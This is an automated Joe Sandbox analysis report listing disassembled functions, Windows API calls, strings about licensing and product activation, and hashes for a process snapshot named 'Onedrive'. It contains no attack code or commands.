Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: swap_c
String ID: %ls$base != nullptr || num == 0$comp != nullptr$minkernel\crts\ucrt\src\appcrt\stdlib\qsort.cpp$qsort$width > 0
API String ID: 1232431964-1732429825
Opcode ID: 4a3968a17c66915b21523281d7ef98170aa3125a496ee0fe839a4808240de0f2
Instruction ID: 27489649ef588c153b421b0b92a3972feda8de9315bb17bc65d6562726fd1fa6
Opcode Fuzzy Hash: 4a3968a17c66915b21523281d7ef98170aa3125a496ee0fe839a4808240de0f2
Instruction Fuzzy Hash: 9422FE3661EF8699DB608B16F48036AB7A4F7897D0F10543AEACD87B68DF7CD4408B41

Function 00007FF6104F83D0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6104F842E
ShellExecuteExW.SHELL32 ref: 00007FF6104F8584
SHCreateItemInKnownFolder.SHELL32 ref: 00007FF6104F85BE
SHGetIDListFromObject.SHELL32 ref: 00007FF6104F85DE
ShellExecuteExW.SHELL32 ref: 00007FF6104F861B
CoTaskMemFree.API-MS-WIN-CORE-COM-L1-1-0 ref: 00007FF6104F862C

Strings

windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel, xrefs: 00007FF6104F85B0
page=SettingsPageActivate, xrefs: 00007FF6104F85F8
%systemroot%\system32\changepk.exe, xrefs: 00007FF6104F855C
p, xrefs: 00007FF6104F8604

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: ExecuteShell$CreateFolderFreeFromItemKnownListObjectTaskmemset
String ID: %systemroot%\system32\changepk.exe$p$page=SettingsPageActivate$windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel
API String ID: 3005131752-2606238965
Opcode ID: d4ab3d875fad306f59177a10c0067e858f47508aeac32058b376bfd7646115ab
Instruction ID: ec78843ca18710f32ee06f48fa6291f4ab91a93162080af2f787b62ecb7a43f0
Opcode Fuzzy Hash: d4ab3d875fad306f59177a10c0067e858f47508aeac32058b376bfd7646115ab
Instruction Fuzzy Hash: 98611D32A08E42E6FF548B18E5942AD77A4FB48BA8F544536EA4DC7B68DF3CD4548700

Function 00007FF8A03272C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A03272E0
Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0327350
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A03273B6
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A032742E
__crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A0327438

Strings

minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 00007FF8A032739F, 00007FF8A0327417
copy_and_add_argument_to_buffer, xrefs: 00007FF8A03273A6, 00007FF8A032741E
traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length), xrefs: 00007FF8A03273AD
traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count), xrefs: 00007FF8A0327425
minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 00007FF8A032732C

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::__invoke_watson_if_error$CriticalLock::_ReentrantSchedulerScheduler::_Scoped_lockScoped_lock::~___crt_unique_heap_ptr
String ID: copy_and_add_argument_to_buffer$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count)$traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length)
API String ID: 3160871131-1477255430
Opcode ID: 56b21e0973dc36537610673c69a775868eecb0e10eaa6e6bc507c90a404b413b
Instruction ID: a0b0e9ff0837b46e958bf4768454fc57bd946f56a46f257253b912b4a01d6f18
Opcode Fuzzy Hash: 56b21e0973dc36537610673c69a775868eecb0e10eaa6e6bc507c90a404b413b
Instruction Fuzzy Hash: B1412B7291EE87A1DB20DF60E4413AAB760FB84384F500236E68D47BAADF7DD545CB40

Function 00007FF6104F1130 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6104F114B
GetProcAddress.KERNEL32 ref: 00007FF6104F1174
GetProcAddress.KERNEL32 ref: 00007FF6104F1193
GetProcAddress.KERNEL32 ref: 00007FF6104F11B2
GetProcAddress.KERNEL32 ref: 00007FF6104F11D1

Strings

EtwEventRegister, xrefs: 00007FF6104F116D
EtwEventUnregister, xrefs: 00007FF6104F1185
EtwEventEnabled, xrefs: 00007FF6104F11A4
ntdll.dll, xrefs: 00007FF6104F113F
EtwEventWrite, xrefs: 00007FF6104F11C3

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EtwEventEnabled$EtwEventRegister$EtwEventUnregister$EtwEventWrite$ntdll.dll
API String ID: 667068680-1838325978
Opcode ID: ba68fdd84bba215f0e08b4479e2c359e52c1883009fe3d1f84edea0320486613
Instruction ID: 5592b4a2a1dda1d9fc38f4bf8a5d0deb7c133a0f947427bbef997266a5fdca39
Opcode Fuzzy Hash: ba68fdd84bba215f0e08b4479e2c359e52c1883009fe3d1f84edea0320486613
Instruction Fuzzy Hash: 0A31036192CE43E2EF109B44E98437876E0FF4AB69F509235D90EC23A8CF7CA198C315

Function 00007FF6104FC7F4 Relevance: 16.6, APIs: 3, Strings: 8, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6104FC821

Part of subcall function 00007FF6104FDD74: GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104FC831), ref: 00007FF6104FDEB2
Part of subcall function 00007FF6104FDD74: HeapFree.KERNEL32(?,?,00000000,00007FF6104FC831), ref: 00007FF6104FDEC6

Part of subcall function 00007FF6104FD98C: GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FDA5B
Part of subcall function 00007FF6104FD98C: HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FDA6F
Part of subcall function 00007FF6104FD98C: GetProcessHeap.KERNEL32(?,?,?,00000000), ref: 00007FF6104FDA90
Part of subcall function 00007FF6104FD98C: HeapFree.KERNEL32(?,?,?,00000000), ref: 00007FF6104FDAA4

GetProcessHeap.KERNEL32 ref: 00007FF6104FC9B9
HeapFree.KERNEL32 ref: 00007FF6104FC9CD

Part of subcall function 00007FF6104FCD40: _wcsicmp.MSVCRT ref: 00007FF6104FCDA1

Strings

KernelTimebombDate, xrefs: 00007FF6104FC913
SkuId, xrefs: 00007FF6104FC8A7
PartialProductKey, xrefs: 00007FF6104FC931
LastValidationError, xrefs: 00007FF6104FC8F5
LastConsumptionReason, xrefs: 00007FF6104FC8C1
LicenseExpirationDate, xrefs: 00007FF6104FC8DB
ProductKeyType, xrefs: 00007FF6104FC94F
GraceEndDate, xrefs: 00007FF6104FC88D

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess$_wcsicmpmemset
String ID: GraceEndDate$KernelTimebombDate$LastConsumptionReason$LastValidationError$LicenseExpirationDate$PartialProductKey$ProductKeyType$SkuId
API String ID: 1329376875-3221521310
Opcode ID: 886d2079de2440a1dc17ccb1289c6ba122f9246d015c5aedb6db7103f639f3d0
Instruction ID: a70e28ee36ce2945d4acfb083c7c1cdfeddf3de6f7cb532b54b30ccc94b1302d
Opcode Fuzzy Hash: 886d2079de2440a1dc17ccb1289c6ba122f9246d015c5aedb6db7103f639f3d0
Instruction Fuzzy Hash: 24512E51B08E17F5FF00ABAA8A901FD23A5AF45BA8F404431CA0DD7796EF79E529C344

Function 00007FF8A0322BD0 Relevance: 16.2, APIs: 1, Strings: 8, Instructions: 425stringCOMMON

Download Yara Rule

APIs

strrchr.LIBCMTD ref: 00007FF8A0322DD2

Strings

result_buffer_count > static_cast<size_t>(1 + 4 + precision + 6), xrefs: 00007FF8A0322C5B, 00007FF8A0322CF0
fp_format_a, xrefs: 00007FF8A0322CE9
minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 00007FF8A0322C7C, 00007FF8A0322CE2
p, xrefs: 00007FF8A0323219
a, xrefs: 00007FF8A0322E82
%ls, xrefs: 00007FF8A0322C67
p, xrefs: 00007FF8A0322DFD
d, xrefs: 00007FF8A032332D

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: strrchr
String ID: %ls$a$d$fp_format_a$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$p$p$result_buffer_count > static_cast<size_t>(1 + 4 + precision + 6)
API String ID: 3418686817-2728534095
Opcode ID: 17bfb08b7208d47e0b63ac4dfe94d956d99bbbadb31a0d70de527a98a45ae178
Instruction ID: feb1b7a0414c21b3f5bfce4c239eba1c91b657d087b8d7882fb7b9eacad48e9e
Opcode Fuzzy Hash: 17bfb08b7208d47e0b63ac4dfe94d956d99bbbadb31a0d70de527a98a45ae178
Instruction Fuzzy Hash: C122183260DBC695DBB18B59F4803AEB7A0E798B90F108026DACD87B99DF7CD445CB10

Function 00007FF8A0323600 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 238COMMON

Download Yara Rule

APIs

_aligned_msize.LIBCMTD ref: 00007FF8A0323897
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A03238C4

Strings

result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1), xrefs: 00007FF8A032366E, 00007FF8A03236FA
minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 00007FF8A032368F, 00007FF8A03236EC, 00007FF8A03238AD
%ls, xrefs: 00007FF8A032367A
strcpy_s( p, result_buffer_count == (static_cast<size_t>(-1)) ? result_buffer_count : result_buffer_count - (p - result_buffer), ", xrefs: 00007FF8A03238BB
fp_format_e_internal, xrefs: 00007FF8A03236F3, 00007FF8A03238B4
e+000, xrefs: 00007FF8A0323886
d, xrefs: 00007FF8A0323947

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: _aligned_msize_invoke_watson_if_error
String ID: %ls$d$e+000$fp_format_e_internal$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)$strcpy_s( p, result_buffer_count == (static_cast<size_t>(-1)) ? result_buffer_count : result_buffer_count - (p - result_buffer), "
API String ID: 1871870440-2583523412
Opcode ID: aa62fee06007f48e728819eef63ab2c458d1392a8ffd5e289f31ac39b7df481c
Instruction ID: c794e09dd169024e483c9e8532d3909541f32dd7ae871978543671d9beded92d
Opcode Fuzzy Hash: aa62fee06007f48e728819eef63ab2c458d1392a8ffd5e289f31ac39b7df481c
Instruction Fuzzy Hash: BDC12B7261EBC69AD7A0CB19E49076AB7A0F799784F005026FA8E87B59CF7DD444CB00

Function 00007FF6104F597C Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 176memoryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32 ref: 00007FF6104F59F1
GetLastError.KERNEL32 ref: 00007FF6104F5A01
GetProcessHeap.KERNEL32 ref: 00007FF6104F5B69
HeapFree.KERNEL32 ref: 00007FF6104F5B7E
GetProcessHeap.KERNEL32 ref: 00007FF6104F5B96
HeapFree.KERNEL32 ref: 00007FF6104F5BAB
GetProcessHeap.KERNEL32 ref: 00007FF6104F5BC3
HeapFree.KERNEL32 ref: 00007FF6104F5BD8

Strings

Tapi32.dll, xrefs: 00007FF6104F5AC7, 00007FF6104F5AEC

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess$DirectoryErrorLastSystem
String ID: Tapi32.dll
API String ID: 2626721824-1902342089
Opcode ID: 42523e2f3836d451c6142b21fa8a96e0ed7b2c118e00aa92d39bf02b790cea9c
Instruction ID: 5db31d4a2244cb494df73497e29f3a0d2d6e5e0b6f7fc3c9c8d55e8cd191f0d0
Opcode Fuzzy Hash: 42523e2f3836d451c6142b21fa8a96e0ed7b2c118e00aa92d39bf02b790cea9c
Instruction Fuzzy Hash: F571A231A08E82E6EF14AB25A4841BD77A4FF85FA4F548031DA0ED7758DF3DE4258740

Function 00007FF6104F2EE0 Relevance: 15.1, APIs: 10, Instructions: 146memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104F60D4: GetSystemDirectoryW.KERNEL32 ref: 00007FF6104F611C
Part of subcall function 00007FF6104F60D4: GetLastError.KERNEL32 ref: 00007FF6104F612C
Part of subcall function 00007FF6104F60D4: GetProcessHeap.KERNEL32 ref: 00007FF6104F6240
Part of subcall function 00007FF6104F60D4: HeapFree.KERNEL32 ref: 00007FF6104F6255

GetProcessHeap.KERNEL32 ref: 00007FF6104F2F3B
HeapAlloc.KERNEL32 ref: 00007FF6104F2F50
SysFreeString.OLEAUT32 ref: 00007FF6104F2F83
GetProcessHeap.KERNEL32 ref: 00007FF6104F2F93
HeapFree.KERNEL32 ref: 00007FF6104F2FA7
?AddString@TouchSelect@DirectUI@@QEAAJPEBG@Z.DUI70 ref: 00007FF6104F304E
?SetSelectionIndex@TouchSelect@DirectUI@@QEAAJH@Z.DUI70 ref: 00007FF6104F306E
SysFreeString.OLEAUT32 ref: 00007FF6104F30A5
GetProcessHeap.KERNEL32 ref: 00007FF6104F30B5
HeapFree.KERNEL32 ref: 00007FF6104F30C9

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$Free$Process$DirectSelect@StringTouch$AllocDirectoryErrorIndex@LastSelectionString@System
String ID:
API String ID: 796372636-0
Opcode ID: 224721544ba5d1b1ccbc45791493ce61aa77e4a84b6f17a629e37a6cd94b57d0
Instruction ID: 44602f06af42b610d730e3c5d5e5d2dc117e82ba125924a7593ad3878db80007
Opcode Fuzzy Hash: 224721544ba5d1b1ccbc45791493ce61aa77e4a84b6f17a629e37a6cd94b57d0
Instruction Fuzzy Hash: C7519F22A08E42D7EF209F29D59027AB7A5FF89FA5F199135DA0E82758DF3CE4518300

Function 00007FF6104F3AFC Relevance: 15.1, APIs: 10, Instructions: 133memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00007FF6104F29DD), ref: 00007FF6104F3B84
HeapAlloc.KERNEL32(?,?,?,00007FF6104F29DD), ref: 00007FF6104F3B98
memmove.MSVCRT(?,?,?,00007FF6104F29DD), ref: 00007FF6104F3BC6
SysFreeString.OLEAUT32 ref: 00007FF6104F3BF7
GetProcessHeap.KERNEL32(?,?,?,00007FF6104F29DD), ref: 00007FF6104F3C07
HeapFree.KERNEL32(?,?,?,00007FF6104F29DD), ref: 00007FF6104F3C1B
GetProcessHeap.KERNEL32(?,?,?,00007FF6104F29DD), ref: 00007FF6104F3C4A
HeapFree.KERNEL32(?,?,?,00007FF6104F29DD), ref: 00007FF6104F3C5E
GetProcessHeap.KERNEL32(?,?,?,00007FF6104F29DD), ref: 00007FF6104F3C8B
HeapFree.KERNEL32(?,?,?,00007FF6104F29DD), ref: 00007FF6104F3C9F

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess$AllocStringmemmove
String ID:
API String ID: 62646686-0
Opcode ID: 611d1cda0b8a6a4730dab94e1e50fdd8b83e19467ea75b13cbd837236330efe6
Instruction ID: 358581b7861587933233f78ad707129676c18554be3c8b792ead943a9c6675a1
Opcode Fuzzy Hash: 611d1cda0b8a6a4730dab94e1e50fdd8b83e19467ea75b13cbd837236330efe6
Instruction Fuzzy Hash: FB518022A08E86D6EE149F56A550239BAA5FF89FE2F09C038DE1E97755DF3CE4118300

Function 00007FF6104F9CD8 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 258memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104FA33C: SLOpen.SLC(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA37E
Part of subcall function 00007FF6104FA33C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA5F9
Part of subcall function 00007FF6104FA33C: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA60D
Part of subcall function 00007FF6104FA33C: LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA622
Part of subcall function 00007FF6104FA33C: LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA63C
Part of subcall function 00007FF6104FA33C: LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA656
Part of subcall function 00007FF6104FA33C: SLClose.SLC(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA670

LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6104F704B), ref: 00007FF6104FA00D
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6104F704B), ref: 00007FF6104FA022
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6104F704B), ref: 00007FF6104FA036

Strings

Kernel-ExpirationDate, xrefs: 00007FF6104F9EFC

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Free$HeapLocal$Process$CloseOpen
String ID: Kernel-ExpirationDate
API String ID: 3289953759-555650421
Opcode ID: ec37c195baf8c0247c0ae37d5ff26c1606d082038a14728f8d7ed840f1ddf7a0
Instruction ID: 8b405a8a2cb35f1336bba749cc6b4b428619efeb378780dc21432cbfa95a6ec9
Opcode Fuzzy Hash: ec37c195baf8c0247c0ae37d5ff26c1606d082038a14728f8d7ed840f1ddf7a0
Instruction Fuzzy Hash: 3DB19F36A08F42D6EB21CF29948067D77A9BB49BA4F154139DE4ED7784DF38E8A1C700

Function 00007FF8A0306D30 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIMED ref: 00007FF8A0306D53

Part of subcall function 00007FF8A0303F80: _guard_icall_checks_enforced.LIBCMTD ref: 00007FF8A0303F89

__FrameHandler3::isEHs.LIBVCRUNTIMED ref: 00007FF8A0306DDE
__FrameUnwindToEmptyState.LIBCMTD ref: 00007FF8A0306F9C
std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FF8A0306FC8
__FrameHandler3::getESTypes.LIBVCRUNTIMED ref: 00007FF8A0306FFB
__FrameHandler3::isNoExcept.LIBVCRUNTIMED ref: 00007FF8A0307025

Strings

csm, xrefs: 00007FF8A0306D70
csm, xrefs: 00007FF8A030703D

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Frame$Handler3::is$EmptyExceptFac_nodeFac_node::_Handler3::getStateTypesUnwind__except_validate_context_record_guard_icall_checks_enforcedstd::_
String ID: csm$csm
API String ID: 1491283442-3733052814
Opcode ID: 9c47b632ef7cd2abb5942c8bc3ac3151e4cb6ba523e81b1d5f0fbc59ecad3f66
Instruction ID: 8c875d522458a133c3578f59ab9df3cf4f0f82a1d9cdb491c67edb5394389de0
Opcode Fuzzy Hash: 9c47b632ef7cd2abb5942c8bc3ac3151e4cb6ba523e81b1d5f0fbc59ecad3f66
Instruction Fuzzy Hash: 8DB1CA36A0EBC295EB709F96E4803AAB7A1FBC4791F504136DA8D47B99CF2CD445CB40

Function 00007FF8A032AE20 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

Strings

minkernel\crts\ucrt\src\appcrt\misc\signal.cpp, xrefs: 00007FF8A032AFD6, 00007FF8A032B010
%ls, xrefs: 00007FF8A032AFC1
raise, xrefs: 00007FF8A032B017
("Invalid signal or error", 0), xrefs: 00007FF8A032AFB5, 00007FF8A032B01E

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: %ls$("Invalid signal or error", 0)$minkernel\crts\ucrt\src\appcrt\misc\signal.cpp$raise
API String ID: 0-1223553036
Opcode ID: e58e9fe811afdfae9308997248f27fe0ad1012204da1e47ecf85e2e0864857f0
Instruction ID: 6b5e7ca452e2ed421a798f504ea46015457a6735bc19e88efbaedee655da0d49
Opcode Fuzzy Hash: e58e9fe811afdfae9308997248f27fe0ad1012204da1e47ecf85e2e0864857f0
Instruction Fuzzy Hash: 09A12A32A0EF8296E7608B55E45036FB7A0FB99784F00443AE68E47B99CF7DE444CB50

Function 00007FF8A0325620 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 133COMMON

Download Yara Rule

APIs

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A032567E
new[].LIBCMTD ref: 00007FF8A0325763
Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0325770
__crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A0325778

Strings

%ls, xrefs: 00007FF8A0325643
minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp, xrefs: 00007FF8A0325658
public_stream != nullptr, xrefs: 00007FF8A0325637
minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp, xrefs: 00007FF8A0325752

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
